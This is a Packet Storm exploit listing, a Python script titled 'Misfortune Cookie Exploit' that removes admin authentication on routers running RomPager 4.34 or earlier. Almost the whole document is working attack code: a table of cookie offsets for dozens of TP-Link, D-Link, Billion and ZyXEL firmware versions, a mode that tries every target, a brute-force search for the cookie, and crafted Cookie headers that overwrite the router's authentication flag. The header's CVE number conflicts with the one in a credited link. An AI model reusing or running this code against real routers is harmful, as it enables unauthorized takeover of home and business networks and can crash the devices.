RomPager 4.34 Authentication Bypass

2016-04-27T00:00:00
ID PACKETSTORM:136831
Type packetstorm
Reporter Milad Doorbash
Modified 2016-04-27T00:00:00

Description

                                        
                                            `# Title: Misfortune Cookie Exploit (RomPager <= 4.34) router authentication remover  
# Date: 17/4/2016  
# CVE: CVE-2015-9222 (http://mis.fortunecook.ie)  
# Vendors: ZyXEL,TP-Link,D-Link,Nilox,Billion,ZTE,AirLive,...  
# Vulnerable models: http://mis.fortunecook.ie/misfortune-cookie-suspected-vulnerable.pdf   
# Versions affected: RomPager <= 4.34 (specifically 4.07)  
# Tested on : firmwares which are set as tested in the targets list  
# Category: Remote Exploit  
# Usage: ./exploit.py url  
# Example: python exploit.py http://192.168.1.1 , python exploit.py https://192.168.1.1:3040  
  
# Author: Milad Doorbash  
# Email: milad.doorbash@gmail.com  
# Social: @doorbash  
# Blog: http://doorbash.ir  
  
# Many Thanks to :   
# Cawan Chui (http://embedsec.systems/embedded-device-security/2015/02/16/Misfortune-Cookie-CVE-2014-9222-Demystified.html)  
# Piotr Bania (http://piotrbania.com/all/articles/tplink_patch)  
# Grant Willcox (https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/2015/10/porting-the-misfortune-cookie-exploit-whitepaperpdf)  
# Chan (http://scz.617.cn/misc/201504141114.txt -- http://www.nsfocus.com.cn/upload/contents/2015/09/2015_09181715274142.pdf)  
  
# Disclaimer :  
# This exploit is for testing and educational purposes only.Any other usage for this code is not allowed.  
# Author takes no responsibility for any actions with provided informations or codes.  
  
# Description :  
# Misfortune Cookie is a critical vulnerability that allows an intruder to remotely  
# take over an Internet router and use it to attack home and business networks.With a few magic  
# cookies added to your request you bypass any authentication and browse the configuration  
# interface as admin, from any open port.  
  
import requests  
import sys  
import time  
  
MODE_TEST = 100000  
MODE_BRUTE_FORCE = 100001  
  
if len(sys.argv) == 1:  
print "usage: python " + sys.argv[0] + " url [enable]"  
print "example: python exploit.py http://192.168.1.1 , python exploit.py https://192.168.1.1:3040"  
exit()  
  
url = str(sys.argv[1])  
auth_byte = '\x00'  
s = requests.Session()  
  
if len(sys.argv) == 3:  
if str(sys.argv[2]) == 'enable':  
auth_byte = '\x01' # enable authenticaion again  
else:  
print "usage: python " + sys.argv[0] + " url [enable]"   
exit()  
  
targets = [  
  
["Azmoon AZ-D140W 2.11.89.0(RE2.C29)3.11.11.52_PMOFF.1",107367693,13], # 0x803D5A79 # tested  
["Billion BiPAC 5102S Av2.7.0.23 (UE0.B1C)",107369694,13], # 0x8032204d # ----------  
["Billion BiPAC 5102S Bv2.7.0.23 (UE0.B1C)",107369694,13], # 0x8032204d # ----------  
["Billion BiPAC 5200 2.11.84.0(UE2.C2)3.11.11.6",107369545,9], # 0x803ec2ad # ----------  
["Billion BiPAC 5200 2_11_62_2_ UE0.C2D_3_10_16_0",107371218,21], # 0x803c53e5 # ----------  
["Billion BiPAC 5200A 2_10_5 _0(RE0.C2)3_6_0_0",107366366,25], # 0x8038a6e1 # ----------  
["Billion BiPAC 5200A 2_11_38_0 (RE0.C29)3_10_5_0",107371453,9], # 0x803b3a51 # ----------  
["Billion BiPAC 5200GR4 2.11.91.0(RE2.C29)3.11.11.52",107367690,21], # 0x803D8A51 # tested  
["Billion BiPAC 5200S 2.10.5.0 (UE0.C2C) 3.6.0.0",107368270,1], # 0x8034b109 # ----------  
["Billion BiPAC 5200SRD 2.12.17.0_UE2.C3_3.12.17.0",107371378,37], # 0x8040587d # ----------  
["Billion BiPAC 5200SRD 2_11_62_2(UE0.C3D)3_11_11_22",107371218,13], # 0x803c49d5 # ----------  
["D-Link DSL-2520U Z1 1.08 DSL-2520U_RT63261_Middle_East_ADSL",107368902,25], # 0x803fea01 # tested  
["D-Link DSL-2600U Z1 DSL-2600U HWZ1",107366496,13], # 0x8040637d # ----------  
["D-Link DSL-2600U Z2 V1.08_ras",107360133,20], # 0x803389B0 # ----------  
["TP-Link TD-8616 V2 TD-8616_v2_080513",107371483,21], # 0x80397055 # ----------  
["TP-Link TD-8816 V4 TD-8816_100528_Russia",107369790,17], # 0x803ae0b1 # ----------  
["TP-Link TD-8816 V4 TD-8816_V4_100524",107369790,17], # 0x803ae0b1 # ----------  
["TP-Link TD-8816 V5 TD-8816_100528_Russia",107369790,17], # 0x803ae0b1 # ----------  
["TP-Link TD-8816 V5 TD-8816_V5_100524",107369790,17], # 0x803ae0b1 # tested  
["TP-Link TD-8816 V5 TD-8816_V5_100903",107369790,17], # 0x803ae0b1 # ----------  
["TP-Link TD-8816 V6 TD-8816_V6_100907",107371426,17], # 0x803c6e09 # ----------  
["TP-Link TD-8816 V7 TD-8816_V7_111103",107371161,1], # 0x803e1bd5 # ----------  
["TP-Link TD-8816 V7 TD-8816_V7_130204",107370211,5], # 0x80400c85 # ----------  
["TP-Link TD-8817 V5 TD-8817_V5_100524",107369790,17], # 0x803ae0b1 # ----------  
["TP-Link TD-8817 V5 TD-8817_V5_100702_TR",107369790,17], # 0x803ae0b1 # ----------  
["TP-Link TD-8817 V5 TD-8817_V5_100903",107369790,17], # 0x803ae0b1 # ----------  
["TP-Link TD-8817 V6 TD-8817_V6_100907",107369788,1], # 0x803b6e09 # ----------  
["TP-Link TD-8817 V6 TD-8817_V6_101221",107369788,1], # 0x803b6e09 # ----------  
["TP-Link TD-8817 V7 TD-8817_V7_110826",107369522,25], # 0x803d1bd5 # ----------  
["TP-Link TD-8817 V7 TD-8817_V7_130217",107369316,21], # 0x80407625 # ----------  
["TP-Link TD-8817 V7 TD-8817_v7_120509",107369321,9], # 0x803fbcc5 # tested  
["TP-Link TD-8817 V8 TD-8817_V8_140311",107351277,20], # 0x8024E148 # Grant Willcox   
["TP-Link TD-8820 V3 TD-8820_V3_091223",107369768,17], # 0x80397E69 # Chan  
["TP-Link TD-8840T V1 TD-8840T_080520",107369845,5], # 0x80387055 # ----------  
["TP-Link TD-8840T V2 TD-8840T_V2_100525",107369790,17], # 0x803ae0b1 # tested  
["TP-Link TD-8840T V2 TD-8840T_V2_100702_TR",107369790,17], # 0x803ae0b1 # ----------  
["TP-Link TD-8840T V2 TD-8840T_v2_090609",107369570,1], # 0x803c65d5 # ----------  
["TP-Link TD-8840T V3 TD-8840T_V3_101208",107369766,17], #0x803c3e89 # tested   
["TP-Link TD-8840T V3 TD-8840T_V3_110221",107369764,5], # 0x803d1a09 # ----------  
["TP-Link TD-8840T V3 TD-8840T_V3_120531",107369688,17], # 0x803fed35 # ----------  
["TP-Link TD-W8101G V1 TD-W8101G_090107",107367772,37], # 0x803bf701 # ----------  
["TP-Link TD-W8101G V1 TD-W8101G_090107",107367808,21], # 0x803e5b6d # ----------  
["TP-Link TD-W8101G V2 TD-W8101G_V2_100819",107367751,21], # 0x803dc701 # ----------  
["TP-Link TD-W8101G V2 TD-W8101G_V2_101015_TR",107367749,13], # 0x803e1829 # ----------  
["TP-Link TD-W8101G V2 TD-W8101G_V2_101101",107367749,13], # 0x803e1829 # ----------  
["TP-Link TD-W8101G V3 TD-W8101G_V3_110119",107367765,25], # 0x804bb941 # ----------  
["TP-Link TD-W8101G V3 TD-W8101G_V3_120213",107367052,25], # 0x804e1ff9 # ----------  
["TP-Link TD-W8101G V3 TD-W8101G_V3_120604",107365835,1], # 0x804f16a9 # ----------  
["TP-Link TD-W8151N V3 TD-W8151N_V3_120530",107353867,24], # 0x8034F3A4 # tested  
["TP-Link TD-W8901G V1 TD-W8901G_080522",107367787,21], # 0x803AB30D # Piotr Bania  
["TP-Link TD-W8901G V1,2 TD-W8901G_080522",107368013,5], # 0x803AB30D # ----------  
["TP-Link TD-W8901G V2 TD-W8901G_090113_Turkish",107368013,5], # 0x803AB30D # ----------  
["TP-Link TD-W8901G V3 TD-W8901G(UK)_V3_140512",107367854,9], # 0x803cf335 # tested  
["TP-Link TD-W8901G V3 TD-W8901G_V3_100603",107367751,21], # 0x803DC701 # chan  
["TP-Link TD-W8901G V3 TD-W8901G_V3_100702_TR",107367751,21], # 0x803DC701 # tested  
["TP-Link TD-W8901G V3 TD-W8901G_V3_100901",107367749,13], # 0x803E1829 # tested  
["TP-Link TD-W8901G V6 TD-W8901G_V6_110119",107367765,25], # 0x804BB941 # Chan  
["TP-Link TD-W8901G V6 TD-W8901G_V6_110915",107367682,21], # 0x804D7CB9 # Chan  
["TP-Link TD-W8901G V6 TD-W8901G_V6_120418",107365835,1], # 0x804F16A9 # ----------  
["TP-Link TD-W8901G V6 TD-W8901G_V6_120213",107367052,25], # 0x804E1FF9 # ----------  
["TP-Link TD-W8901GB V3 TD-W8901GB_V3_100727",107367756,13], # 0x803dfbe9 # ----------  
["TP-Link TD-W8901GB V3 TD-W8901GB_V3_100820",107369393,21], # 0x803f1719 # ----------  
["TP-Link TD-W8901N V1 TD-W8901N v1_111211",107353880,0], # 0x8034FF94 # cawan Chui  
["TP-Link TD-W8951ND V1 TD-TD-W8951ND_V1_101124,100723,100728",107369839,25], # 0x803d2d61 # tested  
["TP-Link TD-W8951ND V1 TD-TD-W8951ND_V1_110907",107369876,13], # 0x803d6ef9 # ----------  
["TP-Link TD-W8951ND V1 TD-W8951ND_V1_111125",107369876,13], # 0x803d6ef9 # ----------  
["TP-Link TD-W8951ND V3 TD-W8951ND_V3.0_110729_FI",107366743,21], # 0x804ef189 # ----------  
["TP-Link TD-W8951ND V3 TD-W8951ND_V3_110721",107366743,21], # 0x804ee049 # ----------  
["TP-Link TD-W8951ND V3 TD-W8951ND_V3_20110729_FI",107366743,21], # 0x804ef189 # ----------  
["TP-Link TD-W8951ND V4 TD-W8951ND_V4_120511",107364759,25], # 0x80523979 # tested  
["TP-Link TD-W8951ND V4 TD-W8951ND_V4_120607",107364759,13], # 0x80524A91 # tested  
["TP-Link TD-W8951ND V4 TD-W8951ND_v4_120912_FL",107364760,21], # 0x80523859 # tested  
["TP-Link TD-W8961NB V1 TD-W8961NB_V1_110107",107369844,17], # 0x803de3f1 # tested  
["TP-Link TD-W8961NB V1 TD-W8961NB_V1_110519",107369844,17], # 0x803de3f1 # ----------  
["TP-Link TD-W8961NB V2 TD-W8961NB_V2_120319",107367629,21], # 0x80531859 # ----------  
["TP-Link TD-W8961NB V2 TD-W8961NB_V2_120823",107366421,13], # 0x80542e59 # ----------  
["TP-Link TD-W8961ND V1 TD-W8961ND_V1_100722,101122",107369839,25], # 0x803D2D61 # tested  
["TP-Link TD-W8961ND V1 TD-W8961ND_V1_101022_TR",107369839,25], # 0x803D2D61 # ----------  
["TP-Link TD-W8961ND V1 TD-W8961ND_V1_111125",107369876,13], # 0x803D6EF9 # ----------  
["TP-Link TD-W8961ND V2 TD-W8961ND_V2_120427",107364732,25], # 0x8052e0e9 # ----------  
["TP-Link TD-W8961ND V2 TD-W8961ND_V2_120710_UK",107364771,37], # 0x80523AA9 # ----------  
["TP-Link TD-W8961ND V2 TD-W8961ND_V2_120723_FI",107364762,29], # 0x8052B6B1 # ----------  
["TP-Link TD-W8961ND V3 TD-W8961ND_V3_120524,120808",107353880,0], # 0x803605B4 # ----------  
["TP-Link TD-W8961ND V3 TD-W8961ND_V3_120830",107353414,36], # 0x803605B4 # ----------  
["ZyXEL P-660R-T3 V3 3.40(BOQ.0)C0",107369567,21], # 0x803db071 # tested  
["ZyXEL P-660RU-T3 V3 3.40(BJR.0)C0",107369567,21], # 0x803db071 # ----------  
  
  
# *---------- means data for this firmware is obtained from other tested firmwares.  
# if you tested on your devices report to me so i can change them to tested state.  
# don't forget to mention your device model and full firmware version in your reports.  
# I could not gather information for every vulnerable firmwares since some vendors has removed  
# vulnerable/old ones from their websites or add some unknown-yet security mechanisms to the them.  
# if you want to add missing firmwares data to list you can do it by reading blog posts  
# mentioned in "Many thanks to" part at the beginning.Btw please don't hesitate to contact me  
# for any question or further information.  
  
]  
  
def request(num,n,data):  
try:  
print "\nConnecting to: " + url + "\n"  
s.headers.update({"Cookie":"C" + str(num) + "=" + "B"* n + data + ";"})  
r = s.get(url)  
print str(r.status_code) + "\n"  
for i in r.headers:  
print i + ": " + r.headers[i]  
return [r.status_code,r.text]  
except Exception, e:  
return 1000  
  
  
def printMenu():  
print """  
__ __ _ __ _   
| \/ (_)___ / _| ___ _ __| |_ _ _ _ __ ___   
| |\/| | / __| |_ / _ \| '__| __| | | | '_ \ / _ \   
| | | | \__ \ _| (_) | | | |_| |_| | | | | __/   
|_| |_|_|___/_| \___/|_| \__|\__,_|_| |_|\___|   
  
____ _ _ _____ _ _ _   
/ ___|___ ___ | | _(_) ___ | ____|_ ___ __ | | ___ (_) |_   
| | / _ \ / _ \| |/ / |/ _ \ | _| \ \/ / '_ \| |/ _ \| | __|  
| |__| (_) | (_) | <| | __/ | |___ > <| |_) | | (_) | | |_   
\____\___/ \___/|_|\_\_|\___| |_____/_/\_\ .__/|_|\___/|_|\__|  
|_|   
  
----------------------------------------------------------------------------  
"""  
for k,i in enumerate(targets):  
print str(k+1) + "- " + i[0]  
  
print """  
0- Not sure just try them all! (may cause reboot)  
T- Test misfortune cookie vulnerablity against target  
B- BruteForce to find auth-remover cookie (may cause reboot)  
"""  
c = 0  
while True:  
selection = raw_input("select a target: ")  
if selection == "T":  
return MODE_TEST  
elif selection == "B":  
return MODE_BRUTE_FORCE  
c = int(selection)  
if c <= len(targets):  
break  
else:  
print "bad input try again"  
return c - 1  
  
def bruteforce():  
for i in range(107364000,107380000):  
for j in range(0,40):  
print "testing " + str(i) + " , " + str(j)  
result = request(i,j,"\x00")[0]  
if result <= 302:  
print "YEAHHH!!!!"  
print str(i) + " , " + str(j) + " is the answer!"  
return  
elif result == 1000:  
time.sleep(60)  
  
def exploit():  
c = printMenu()  
if c < 0:  
for k,i in enumerate(targets):  
print "testing #" + str(k+1) + " ..."  
result = request(i[1],i[2],auth_byte)[0]  
if result == 1000:  
print "\n[!] Error. maybe router crashed by sending wrong cookie or it's your connection problem.waiting 60 seconds for router to reboot"  
time.sleep(60)  
elif result <= 302:  
print "\n[!] Seems good but check " + url + " using your browser to verify if authentication is disabled or not."  
break # some routers always return 200 (for custom login page). so maybe we should comment this line  
else:  
print "\n[!] Failed."  
else:  
if c == MODE_TEST:  
if "HelloWorld" in request(107373883,0,"/HelloWorld")[1]:  
print "\n[!] Target is vulnerable"  
else:  
print "\n[!] Target is not vulnerable"  
elif c == MODE_BRUTE_FORCE:  
bruteforce()  
elif request(targets[c][1],targets[c][2],auth_byte)[0] > 302:  
print "\n[!] Failed."  
else:  
print "\n[!] Seems good but check " + url + " using your browser to verify if authentication is disabled or not."  
  
exploit()  
  
`